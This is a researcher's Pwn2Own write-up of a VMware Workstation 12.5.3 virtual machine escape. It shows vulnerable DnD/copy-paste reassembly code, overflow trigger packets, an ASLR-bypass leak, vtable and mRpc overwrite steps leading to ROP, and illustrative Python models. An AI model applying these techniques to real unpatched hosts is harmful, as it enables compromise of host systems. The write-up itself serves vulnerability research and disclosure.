1. Introduction
In March 2017, Chaitin Security Research Lab took part in the Pwn2Own hacking contest. As a member of the team, I focused on VMware Workstation Pro and completed a virtual machine escape exploit before the contest. Unfortunately, on March 14, the day before Pwn2Own started, VMware released a new version that fixed the vulnerability we exploited. In this article, I cover the whole process, from discovering the vulnerability to completing the exploit. Thanks to @kelwin for his help in implementing the exploit, and to our friends at ZDI, whose recent blog post on a related topic prompted us to finish this writeup.
This article has three parts: first a brief introduction to the RPCI mechanism in VMware, then a description of the vulnerability, and finally an explanation of how we used it to bypass ASLR and achieve code execution.
2. VMware RPCI mechanism
VMware implements several ways for a virtual machine (hereafter, the guest) and the host machine (hereafter, the host) to communicate. One of them is an interface called the backdoor. Its design is interesting: the guest can send commands through it from user mode. VMware Tools also uses this interface for part of its communication with the host. Let's look at some of the relevant code (excerpt from lib/backdoor/backdoorGcc64.c in open-vm-tools):
void
Backdoor_InOut(Backdoor_proto *myBp) // IN/OUT
{
   uint64 dummy;

   __asm__ __volatile__(
#ifdef __APPLE__
        /*
         * Save %rbx on the stack because the Mac OS GCC doesn't want us to
         * clobber it - it erroneously thinks %rbx is the PIC register.
         * (Radar bug 7304232)
         */
        "pushq %%rbx"           "\n\t"
#endif
        "pushq %%rax"           "\n\t"
        "movq 40(%%rax), %%rdi" "\n\t"
        "movq 32(%%rax), %%rsi" "\n\t"
        "movq 24(%%rax), %%rdx" "\n\t"
        "movq 16(%%rax), %%rcx" "\n\t"
        "movq  8(%%rax), %%rbx" "\n\t"
        "movq   (%%rax), %%rax" "\n\t"
        "inl %%dx, %%eax"       "\n\t"  /* NB: There is no inq instruction */
        "xchgq %%rax, (%%rsp)"  "\n\t"
        "movq %%rdi, 40(%%rax)" "\n\t"
        "movq %%rsi, 32(%%rax)" "\n\t"
        "movq %%rdx, 24(%%rax)" "\n\t"
        "movq %%rcx, 16(%%rax)" "\n\t"
        "movq %%rbx,  8(%%rax)" "\n\t"
        "popq          (%%rax)" "\n\t"
#ifdef __APPLE__
        "popq %%rbx"            "\n\t"
#endif
      : "=a" (dummy)
      : "0" (myBp)
      /*
       * vmware can modify the whole VM state without the compiler knowing
       * it. So far it does not modify EFLAGS. --hpreg
       */
      :
#ifndef __APPLE__
      /* %rbx is unchanged at the end of the function on Mac OS. */
      "rbx",
#endif
      "rcx", "rdx", "rsi", "rdi", "memory"
   );
}
An unusual instruction, inl, appears in the code above. In a typical environment (such as the default I/O privilege settings on Linux), a user-mode program cannot execute I/O instructions: the instruction raises a privilege fault and the program crashes. Here, however, the fault generated by the instruction is trapped by the hypervisor on the host, and that is what makes the communication possible. Being able to talk to the host directly from a user-mode program in the guest creates an interesting attack surface, and it meets the Pwn2Own requirement: "In this category (the virtual machine escape challenge), the attack must originate from a non-administrator account in the guest and achieve arbitrary code execution on the host operating system."
The guest places the magic value 0x564D5868 in $eax and the I/O port number 0x5658 or 0x5659 in $dx, corresponding to low-bandwidth and high-bandwidth communication respectively. The other registers carry parameters; for example, the low 16 bits of $ecx hold the command number. For RPCI communication, the command number is BDOOR_CMD_MESSAGE (= 30). The file lib/include/backdoor_def.h contains the list of supported backdoor commands. After the host traps the fault, it reads the command number and dispatches it to the corresponding handler. I have omitted many details here; if you are interested, read the relevant source code.
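To make the register convention concrete, here is a minimal Python sketch that only computes the values a guest would load before executing inl. It does not perform any I/O. The helper name backdoor_registers and the high16 parameter are hypothetical; the magic value, port numbers and command number are the ones given in the text.

```python
BDOOR_MAGIC = 0x564D5868      # value placed in $eax
BDOOR_PORT_LOW = 0x5658       # low-bandwidth I/O port, placed in $dx
BDOOR_PORT_HIGH = 0x5659      # high-bandwidth I/O port, placed in $dx
BDOOR_CMD_MESSAGE = 30        # command number used for RPCI


def backdoor_registers(command, high_bandwidth=False, high16=0):
    """Return the register values for one backdoor call (model only).

    high16 is an illustrative placeholder for whatever the caller wants
    in the upper half of $ecx; the text only specifies the low 16 bits.
    """
    if not 0 <= command <= 0xFFFF:
        raise ValueError("command number must fit in 16 bits")
    return {
        "eax": BDOOR_MAGIC,
        "ecx": ((high16 & 0xFFFF) << 16) | command,
        "dx": BDOOR_PORT_HIGH if high_bandwidth else BDOOR_PORT_LOW,
    }


regs = backdoor_registers(BDOOR_CMD_MESSAGE)
print({name: hex(value) for name, value in regs.items()})
```

The remaining registers (parameters and results) are left out because their meaning depends on the specific command.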
2.1 RPCI
The remote procedure call interface, RPCI, is built on top of the backdoor mechanism described above. Through it, the guest can ask the host to perform certain operations, such as drag-and-drop and copy-paste, or sending and retrieving information. The format of an RPCI request is very simple: <command> <arguments>. For example, the RPCI request info-get guestinfo.ip retrieves the IP address of the guest. Each RPCI command is registered and handled inside the vmware-vmx process.
It is important to note that some RPCI commands are implemented based on VMCI sockets, but this content is beyond the scope of this article.
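As a small illustration of the request format, the sketch below builds and splits a request string. Both helper names are hypothetical and nothing here talks to a hypervisor; it only shows that the command is the first space-delimited token and the rest is the argument string.

```python
def build_rpci_request(command, *args):
    """Join a command and its arguments into '<command> <arguments>'."""
    return " ".join((command,) + args).encode("ascii")


def split_rpci_request(request):
    """Split a request into (command, argument string)."""
    command, _, arguments = request.decode("ascii").partition(" ")
    return command, arguments


request = build_rpci_request("info-get", "guestinfo.ip")
print(request, split_rpci_request(request))
```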
3. Vulnerability
After spending some time reverse engineering the various RPCI handlers, I decided to focus on the drag-and-drop (hereafter DnD) and copy-paste (hereafter CP) functionality. These are probably the most complex RPCI commands, and therefore the most likely place to find a vulnerability. After studying the internals of DnD/CP in depth, it became clear that many of these functions cannot be reached without user interaction. The core of DnD/CP maintains a state machine, and many of its states cannot be reached without user interaction, such as dragging the mouse from the host into the guest.
I decided to look at the vulnerability exploited at PwnFest 2016, which is mentioned in a VMware security advisory. By then my IDB already had many symbols annotated, so it was easy to locate the patch with BinDiff. The following code is the vulnerable function as it was before the patch (the corresponding source is in services/plugins/dndcp/dnd/dndCPMsgV4.c; the vulnerability still exists in the master branch of the open-vm-tools git repository):
static Bool
DnDCPMsgV4IsPacketValid(const uint8 *packet,
                        size_t packetSize)
{
   DnDCPMsgHdrV4 *msgHdr = NULL;
   ASSERT(packet);

   if (packetSize < DND_CP_MSG_HEADERSIZE_V4) {
      return FALSE;
   }

   msgHdr = (DnDCPMsgHdrV4 *)packet;

   /* Payload size is not valid. */
   if (msgHdr->payloadSize > DND_CP_PACKET_MAX_PAYLOAD_SIZE_V4) {
      return FALSE;
   }

   /* Binary size is not valid. */
   if (msgHdr->binarySize > DND_CP_MSG_MAX_BINARY_SIZE_V4) {
      return FALSE;
   }

   /* Payload size is more than binary size. */
   if (msgHdr->payloadOffset + msgHdr->payloadSize > msgHdr->binarySize) { // [1]
      return FALSE;
   }

   return TRUE;
}

Bool
DnDCPMsgV4_UnserializeMultiple(DnDCPMsgV4 *msg,
                               const uint8 *packet,
                               size_t packetSize)
{
   DnDCPMsgHdrV4 *msgHdr = NULL;
   ASSERT(msg);
   ASSERT(packet);

   if (!DnDCPMsgV4IsPacketValid(packet, packetSize)) {
      return FALSE;
   }

   msgHdr = (DnDCPMsgHdrV4 *)packet;

   /*
    * For each session, there is at most 1 big message. If the received
    * sessionId is different with buffered one, the received packet is for
    * another new message. Destroy old buffered message.
    */
   if (msg->binary &&
       msg->hdr.sessionId != msgHdr->sessionId) {
      DnDCPMsgV4_Destroy(msg);
   }

   /* Offset should be 0 for new message. */
   if (NULL == msg->binary && msgHdr->payloadOffset != 0) {
      return FALSE;
   }

   /* For existing buffered message, the payload offset should match. */
   if (msg->binary &&
       msg->hdr.sessionId == msgHdr->sessionId &&
       msg->hdr.payloadOffset != msgHdr->payloadOffset) {
      return FALSE;
   }

   if (NULL == msg->binary) {
      memcpy(msg, msgHdr, DND_CP_MSG_HEADERSIZE_V4);
      msg->binary = Util_SafeMalloc(msg->hdr.binarySize);
   }

   /* msg->hdr.payloadOffset is used as received binary size. */
   memcpy(msg->binary + msg->hdr.payloadOffset,
          packet + DND_CP_MSG_HEADERSIZE_V4,
          msgHdr->payloadSize); // [2]
   msg->hdr.payloadOffset += msgHdr->payloadSize;
   return TRUE;
}
In version 4 of DnD/CP, when the guest sends fragmented DnD/CP command packets, the host calls the function above to reassemble the message. For the first packet received, payloadOffset must be 0, and binarySize gives the size of the buffer allocated on the heap. The check at [1] compares against the binarySize in the packet header to make sure that payloadOffset and payloadSize stay in bounds. At [2], the data is copied into the allocated buffer. However, the check at [1] is flawed: it is only sound for the first packet. For subsequent packets, the code assumes that the binarySize in the header equals that of the first packet in the fragment stream, but nothing enforces this. A later packet can therefore specify a larger binarySize to pass the check and trigger a heap overflow.
The vulnerability can thus be triggered by sending the following two fragments:
packet 1 {
    ...
    binarySize = 0x100
    payloadOffset = 0
    payloadSize = 0x50
    sessionId = 0x41414141
    ...
    #...0x50 bytes...#
}

packet 2 {
    ...
    binarySize = 0x1000
    payloadOffset = 0x50
    payloadSize = 0x100
    sessionId = 0x41414141
    ...
    #...0x100 bytes...#
}
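The effect of these two fragments can be reproduced with a small Python model of the pre-patch logic. This is a sketch rather than VMware's code: the class and field names are hypothetical, the two size limits are stand-in values instead of the real constants, and no memory is actually corrupted; the model only counts how many bytes would land past the allocation.

```python
from dataclasses import dataclass

MAX_PAYLOAD = 0x10000    # stand-in limit, not the real constant
MAX_BINARY = 0x400000    # stand-in limit, not the real constant


@dataclass
class Packet:
    session_id: int
    binary_size: int
    payload_offset: int
    payload: bytes


class Reassembler:
    """Models the pre-patch flow of DnDCPMsgV4_UnserializeMultiple."""

    def __init__(self):
        self.reset()

    def reset(self):
        self.session_id = None   # None plays the role of msg->binary == NULL
        self.capacity = 0        # size malloc'ed from the first header
        self.received = 0        # plays the role of msg->hdr.payloadOffset
        self.overflow = 0        # bytes written past the allocation

    def feed(self, p):
        # Check [1]: uses only fields taken from the incoming header.
        if len(p.payload) > MAX_PAYLOAD or p.binary_size > MAX_BINARY:
            return False
        if p.payload_offset + len(p.payload) > p.binary_size:
            return False
        if self.session_id is not None and self.session_id != p.session_id:
            self.reset()                         # new message, drop the old one
        if self.session_id is None:
            if p.payload_offset != 0:
                return False
            self.session_id = p.session_id
            self.capacity = p.binary_size        # buffer sized by first fragment
        elif self.received != p.payload_offset:
            return False
        # Copy [2]: nothing compares the write against self.capacity.
        end = self.received + len(p.payload)
        self.overflow += max(0, end - max(self.capacity, self.received))
        self.received = end
        return True


r = Reassembler()
r.feed(Packet(0x41414141, 0x100, 0, b"A" * 0x50))
r.feed(Packet(0x41414141, 0x1000, 0x50, b"B" * 0x100))
print(hex(r.capacity), hex(r.overflow))
```

Both fragments are accepted, and the second one writes 0x50 bytes beyond the 0x100-byte buffer sized by the first.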
Knowing this, I decided to check whether version 3 of DnD/CP had a similar problem. Surprisingly, almost the same flaw exists in the version 3 code. We first found it by reverse engineering, and only later realized that the v3 code is also in the open-vm-tools git repository:
Bool
DnD_TransportBufAppendPacket(DnDTransportBuffer *buf,          // IN/OUT
                             DnDTransportPacketHeader *packet, // IN
                             size_t packetSize)                // IN
{
   ASSERT(buf);
   ASSERT(packetSize == (packet->payloadSize + DND_TRANSPORT_PACKET_HEADER_SIZE) &&
          packetSize <= DND_MAX_TRANSPORT_PACKET_SIZE &&
          (packet->payloadSize + packet->offset) <= packet->totalSize &&
          packet->totalSize <= DNDMSG_MAX_ARGSZ);

   if (packetSize != (packet->payloadSize + DND_TRANSPORT_PACKET_HEADER_SIZE) ||
       packetSize > DND_MAX_TRANSPORT_PACKET_SIZE ||
       (packet->payloadSize + packet->offset) > packet->totalSize || // [1]
       packet->totalSize > DNDMSG_MAX_ARGSZ) {
      goto error;
   }

   /*
    * If seqNum does not match, it means either this is the first packet, or there
    * is a timeout in another side. Reset the buffer in all cases.
    */
   if (buf->seqNum != packet->seqNum) {
      DnD_TransportBufReset(buf);
   }

   if (!buf->buffer) {
      ASSERT(!packet->offset);
      if (packet->offset) {
         goto error;
      }
      buf->buffer = Util_SafeMalloc(packet->totalSize);
      buf->totalSize = packet->totalSize;
      buf->seqNum = packet->seqNum;
      buf->offset = 0;
   }

   if (buf->offset != packet->offset) {
      goto error;
   }

   memcpy(buf->buffer + buf->offset,
          packet->payload,
          packet->payloadSize);
   buf->offset += packet->payloadSize;
   return TRUE;

error:
   DnD_TransportBufReset(buf);
   return FALSE;
}
This function is called to reassemble fragments in version 3 of DnD/CP. At [1] we see the same situation as before: the code still assumes that the totalSize in subsequent fragments matches that of the first fragment. The vulnerability can therefore be triggered in the same way:
packet 1 {
    ...
    totalSize = 0x100
    payloadOffset = 0
    payloadSize = 0x50
    seqNum = 0x41414141
    ...
    #...0x50 bytes...#
}

packet 2 {
    ...
    totalSize = 0x1000
    payloadOffset = 0x50
    payloadSize = 0x100
    seqNum = 0x41414141
    ...
    #...0x100 bytes...#
}
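For contrast, the following Python sketch shows the kind of check that would reject the second fragment: validate follow-up fragments against the state recorded from the first one instead of against their own header. This is one plausible hardening written for illustration, not necessarily what VMware's patch does, and the function name append_allowed is hypothetical.

```python
def append_allowed(buf_total_size, buf_offset,
                   pkt_total_size, pkt_offset, payload_size):
    """Return True if a follow-up fragment may be copied into the buffer.

    buf_* is the state saved when the first fragment allocated the buffer;
    pkt_* and payload_size come from the incoming, untrusted header.
    """
    if pkt_total_size != buf_total_size:    # header must agree with fragment 1
        return False
    if pkt_offset != buf_offset:            # fragments must arrive in order
        return False
    # The copy must end inside the original allocation.
    return buf_offset + payload_size <= buf_total_size


# Fragment 2 from the listing above: larger totalSize, 0x100-byte payload.
print(append_allowed(0x100, 0x50, 0x1000, 0x50, 0x100))
# A well-formed second fragment that exactly fills the buffer.
print(append_allowed(0x100, 0x50, 0x100, 0x50, 0xB0))
```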
For a contest like Pwn2Own, this is a weak vulnerability: it was directly inspired by a previous one and can even be considered the same bug. So it is not surprising that it was patched before the contest (although we would have preferred it not be fixed the day before). VMware published a security advisory for the fix. The latest version of VMware Workstation Pro affected by this vulnerability is 12.5.3.
Next, let's look at how this vulnerability can be used to escape from the guest to the host.
4. Exploit
To achieve code execution, we need to overwrite a function pointer on the heap, or corrupt the vtable pointer of a C++ object.
First, let's look at how to switch the DnD/CP protocol to version 3. This is done by sending the following RPCI commands in order:
tools.capability.dnd_version 3
tools.capability.copypaste_version 3
vmx.capability.dnd_version
vmx.capability.copypaste_version
The first two commands set the DnD and Copy/Paste versions, and the last two query them. The queries are necessary because only querying the version actually triggers the switch. The RPCI command vmx.capability.dnd_version checks whether the DnD/CP protocol version has been modified and, if so, creates C++ objects for the corresponding version. For version 3, two C++ objects of size 0xa8 are created, one for DnD commands and the other for Copy/Paste commands.
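The ordering requirement (set first, then query) can be captured in a few lines of Python. This is a sketch under the assumption that some transport function for RPCI requests already exists; send_rpci is a hypothetical callable supplied by the caller, and both helper names are made up for illustration.

```python
def version_switch_commands(version):
    """Return the RPCI commands, in order, that select a DnD/CP version."""
    set_cmds = [
        f"tools.capability.dnd_version {version}",
        f"tools.capability.copypaste_version {version}",
    ]
    # The queries must follow: only querying triggers the actual switch.
    query_cmds = [
        "vmx.capability.dnd_version",
        "vmx.capability.copypaste_version",
    ]
    return set_cmds + query_cmds


def switch_version(send_rpci, version=3):
    """Send every command through send_rpci and collect the replies."""
    return [send_rpci(cmd) for cmd in version_switch_commands(version)]


# Dry run: record the commands instead of sending them anywhere.
sent = []
switch_version(sent.append)
print("\n".join(sent))
```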
This vulnerability lets us control both the size of the allocation and the size of the overflow, and it also lets us perform multiple out-of-bounds writes. Ideally, we would use it to allocate a memory block of size 0xa8 that ends up right before one of the C++ objects, then use the heap overflow to overwrite the object's vtable pointer so that it points to memory we control, and obtain code execution that way.
This is not as easy as it sounds, and some other problems have to be solved first. In particular, we need a way to bypass ASLR while dealing with the Windows Low Fragmentation Heap (LFH).
4.1 Bypassing ASLR
In general, we need an object that we can corrupt through the overflow and then use to leak information, for example an object containing a length or a data pointer that can be read back from the guest. We did not find such an object. So we reverse engineered more RPCI handlers to see what was available. Paired commands are especially interesting: one command stores some data and a related command retrieves it. We eventually settled on the pair info-set and info-get:
info-set guestinfo.KEY VALUE
info-get guestinfo.KEY
VALUE is a string. Its length controls the size of the buffer allocated on the heap, and we can allocate as many strings as we like. But how can these strings be used to leak data? By overflowing across the terminating null byte of a string, we make the string run into the adjacent memory block. If we can place a string between the block where the overflow occurs and the DnD or CP object, we can leak the object's vtable address, which tells us the base address of vmware-vmx. Although LFH allocations on Windows are randomized, we can allocate as many strings as we like and so increase the chance of getting this heap layout. We still have no control over whether a DnD or CP object lies after the overflowed buffer. In our tests, tuning parameters such as the number of strings allocated and freed gave a success rate of 60% to 80%.
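The leak primitive can be illustrated with a toy heap in Python. This is a deliberately simplified sketch: it assumes three perfectly adjacent 0xa8-byte chunks with no heap metadata between them, the pointer value is made up, and read_c_string stands in for what info-get would return for the string.

```python
import struct

CHUNK = 0xA8                      # bucket size from the text
VTABLE = 0x00007FF6_12345678      # made-up pointer value for the demo

# Three adjacent chunks: [overflow buffer][string S][target object T].
heap = bytearray(CHUNK * 3)
heap[CHUNK:CHUNK + 0x20] = b"A" * 0x1F + b"\x00"     # short string in S
struct.pack_into("<Q", heap, 2 * CHUNK, VTABLE)       # T starts with its vtable


def read_c_string(mem, start):
    """Return the bytes from start up to (not including) the first NUL."""
    end = mem.index(0, start)
    return bytes(mem[start:end])


print(read_c_string(heap, CHUNK))             # before: just the "A" string

# Overflow out of chunk 0 and across all of S, destroying its terminator.
heap[0:2 * CHUNK] = b"B" * (2 * CHUNK)

leak = read_c_string(heap, CHUNK)             # after: S runs on into T
pointer_bytes = leak[CHUNK:]                  # bytes that spilled in from T
leaked_vtable = int.from_bytes(pointer_bytes.ljust(8, b"\x00"), "little")
print(hex(leaked_vtable))
```

Only six pointer bytes come back because the two top bytes of a user-mode address are zero and end the string, which is why the value is padded before decoding.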
[Figure: the heap layout we build, where Ov denotes the overflowed memory block, S a string, and T the target object.]
Our strategy is to first allocate a number of strings filled with "A", then write some "B" bytes through the overflow, and then read back all the allocated strings: the one containing "B" is the string that was overflowed. This gives us a string that can be used to read leaked data. We then keep overflowing in steps of 0xa8, the block size of the bucket, and check the leaked data after each overflow. Since the vtables of the DnD and CP objects are at fixed offsets from the vmware-vmx base address, checking the lowest bits of the leaked data after each overflow is enough to tell whether the overflow has reached the target object.
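The low-bits check works because Windows maps images on 64 KiB boundaries, so the low 16 bits of a vtable address are the same as the low 16 bits of its offset inside the image. The Python sketch below shows the comparison; the two offsets in VTABLE_RVAS are made-up values, not the real offsets in any vmware-vmx build, and identify_object is a hypothetical helper.

```python
VTABLE_RVAS = {            # made-up vtable offsets inside vmware-vmx
    "DnD": 0x7A1B30,
    "CopyPaste": 0x7A1C48,
}
ALIGN_MASK = 0xFFFF        # image bases are 64 KiB aligned


def identify_object(leaked_pointer):
    """Return (object name, image base) if the leak matches a known vtable."""
    for name, rva in VTABLE_RVAS.items():
        if (leaked_pointer & ALIGN_MASK) == (rva & ALIGN_MASK):
            base = leaked_pointer - rva
            if base & ALIGN_MASK == 0:      # sanity check on the result
                return name, base
    return None


print(identify_object(0x7FF612340000 + 0x7A1C48))
print(identify_object(0x4242424242424242))    # still string data, keep going
```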
4.2 Get Code Execution
Now that we have the information leak and know which C++ object was overflowed, we can move on to code execution. There are two cases to handle: the overflowed object is either the CopyPaste object or the DnD object. Note that many code paths can probably be used here; we just picked one.
4.2.1 Overwriting the CopyPaste object
For the CopyPaste object, we can overwrite the vtable pointer so that it points to data we control. For that we need controllable data at a known address that can serve as the object's vtable. We used another RPCI command for this, unity.window.contents.start. This command is mainly used in Unity mode to draw images on the host, and it lets us write some data at a known offset from the vmware-vmx base. The command takes the width and height of the image as parameters, each 32 bits wide; combined, they give us a 64-bit value at a known location. We use that value as an entry in the fake vtable and trigger the virtual function call by sending a CopyPaste command. The steps are:
- Send the unity.window.contents.start command, choosing width and height so that the 64-bit address of a stack pivot gadget is written to the global variable.
- Overwrite the object's vtable pointer so that it points to the fake vtable (adjusting the vtable address offset).
- Send a CopyPaste command to trigger the virtual function call.
- ROP.
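The first step amounts to splitting one 64-bit address into two 32-bit parameters. The Python sketch below shows the arithmetic. It assumes that width ends up in the lower four bytes and height in the upper four; the text does not state the order, so it would have to be confirmed in the binary. Both helper names and the example address are hypothetical.

```python
import struct


def split_qword(value):
    """Split a 64-bit value into (low dword, high dword)."""
    raw = struct.pack("<Q", value)
    low, high = struct.unpack("<II", raw)
    return low, high


def unity_start_dimensions(gadget_address):
    # Assumption: width is stored first (low dword), height second.
    width, height = split_qword(gadget_address)
    return width, height


width, height = unity_start_dimensions(0x00007FF612345678)
print(hex(width), hex(height))
```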
4.2.2 Overwriting the DnD object
For the DnD object, we cannot simply overwrite the vtable pointer. The vtable is accessed immediately after the overflow and a different virtual function is called, while the width and height of the Unity image give us control of only a single qword, not a larger vtable.
Let's look at the structure of the DnD and CP objects, summarized below (similar structures can be found in open-vm-tools, but they differ slightly in vmware-vmx):
DnD_CopyPaste_RpcV3 {
    void *vtable;
    ...
    uint64_t ifacetype;
    RpcUtil {
        void *vtable;
        RpcBase *mRpc;
        DnDTransportBuffer {
            uint64_t seqNum;
            uint8_t *buffer;
            uint64_t totalSize;
            uint64_t offset;
            ...
        }
        ...
    }
}

RpcBase {
    void *vtable;
    ...
}
Many fields that are irrelevant to this article are omitted from the structures above. The object contains a pointer, mRpc, to another C++ object of type RpcBase. If we can overwrite the mRpc field with a pointer to a pointer to data we control, we control the vtable of the RpcBase object. For this we can again use the unity.window.contents.start command. Another parameter of this command is imgsize, which sets the size of the allocated image buffer. Once the buffer is allocated, its address is stored in a global variable at a fixed offset in vmware-vmx. We can use the unity.window.contents.chunk command to fill the buffer. The steps are as follows:
- Send the unity.window.contents.start command to allocate a buffer, which will later hold a forged vtable.
- Send the unity.window.contents.chunk command to fill in the forged vtable, whose entries hold the address of a stack pivot gadget.
- Use the overflow to overwrite the mRpc field of the DnD object so that it points to the global variable where the buffer address is stored, that is, to a pointer to a pointer.
- Send a DnD command to trigger a virtual function call through the mRpc field.
- ROP.
P.S.: the vmware-vmx process has a memory page that is readable, writable and executable (at least in version 12.5.3).
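The double indirection in these steps is easier to follow with a toy model. In the Python sketch below, memory is a dictionary from addresses to 64-bit values and a virtual call is resolved the way compiled C++ does it: read the vtable pointer from the first qword of the object, then read the function pointer from the vtable. Every address and the slot index are made-up values chosen for illustration.

```python
memory = {}                          # address -> 64-bit value, a toy flat memory

GLOBAL_SLOT = 0x140B00000            # made-up global that stores the buffer address
IMAGE_BUFFER = 0x000002A000001000    # made-up address of the Unity image buffer
PIVOT_GADGET = 0x140123456           # made-up stack pivot gadget address
SLOT_INDEX = 2                       # made-up index of the virtual method called


def virtual_call_target(object_ptr, slot):
    """Resolve the address a C++ virtual call on object_ptr would jump to."""
    vtable = memory[object_ptr]              # first qword of the object
    return memory[vtable + 8 * slot]         # function pointer in the vtable


# Steps 1 and 2: start allocates the buffer and records its address in the
# global; chunk fills the buffer with a forged vtable.
memory[GLOBAL_SLOT] = IMAGE_BUFFER
for i in range(4):
    memory[IMAGE_BUFFER + 8 * i] = PIVOT_GADGET

# Step 3: the overflow makes mRpc point at the global. The global now acts
# as a fake RpcBase object whose "vtable" field is the buffer address.
dnd_object = {"mRpc": GLOBAL_SLOT}

# Step 4: a DnD command performs a virtual call through mRpc.
target = virtual_call_target(dnd_object["mRpc"], SLOT_INDEX)
print(hex(target))
```

Pointing mRpc at the global rather than at the buffer itself is what makes this work without knowing the heap address of the buffer: only offsets inside vmware-vmx are needed, and those follow from the leaked vtable.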
4.3 Stability Discussion
As mentioned earlier, because of the randomization of the Windows LFH heap, the current exploit cannot reach a 100% success rate. The following ideas may help improve it:
- Observe the 0xa8-sized allocations and look for sequences of malloc and free calls that make LFH allocations deterministic.
- Look for other C++ objects on the heap, especially ones that can be sprayed.
- Look for other heap objects that contain function pointers, especially ones that can be sprayed.
- Find a separate information disclosure vulnerability.
- Anything else you can think of.
4.4 Demo
Demo Video: VMware Workstation 12.5.3 Escape Demo